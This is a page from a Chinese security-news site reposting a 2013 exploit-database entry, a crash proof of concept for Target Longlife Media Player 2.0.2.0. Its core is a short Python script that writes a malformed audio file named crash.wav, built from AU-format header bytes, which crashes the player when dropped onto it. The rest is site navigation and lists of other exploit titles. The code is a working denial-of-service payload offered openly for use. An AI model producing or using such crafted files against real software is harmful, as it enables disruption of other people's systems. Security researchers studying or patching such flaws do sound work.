首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Target Longlife Media Player 2.0.2.0 Crash Proof Of Concept
来源:http://www.cr0security.com 作者:gunslinger 发布时间:2013-09-13  
# Exploit Title		: Target Longlife Media Player Version 2.0.2.0 - (.wav) - Crash POC
# Date				: 11-09-2013
# Exploit Author	: gunslinger_ <yuda at cr0security.com> - http://www.cr0security.com
# Software Link		: http://download.cnet.com/Target-Longlife-Media-Player/3000-2139_4-10417975.html
# Version			: 2.0.2.0 (Probably old version of software and the LATEST version too)
# Vendor Homepage	: -
# Tested on			: Windows XP sp3
#============================================================================================
# After creating POC file (.wav), and simply drag and drop it to Player.
#============================================================================================
#!/usr/bin/python
 
string=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22")
 
filename = "crash.wav"
file = open(filename , "w")
file.write(string)
file.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS13-053 Win32k Memory Allocat
·Vestel TV 42pf9322 - Denial of
·eM Client e-mail client v5.0.1
·Mitsubishi MC-WorkX 8.02 Activ
·Watchguard Server Center 11.7.
·Ofilter Player 1.2.0.1 Buffer
·MS13-055 Microsoft Internet Ex
·PCMAN FTP 2.07 STOR Command -
·HP SiteScope Remote Code Execu
·D-Link Devices UPnP SOAP Telne
·freeFTPd 1.0.10 PASS Command S
·Sophos Web Protection Applianc
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved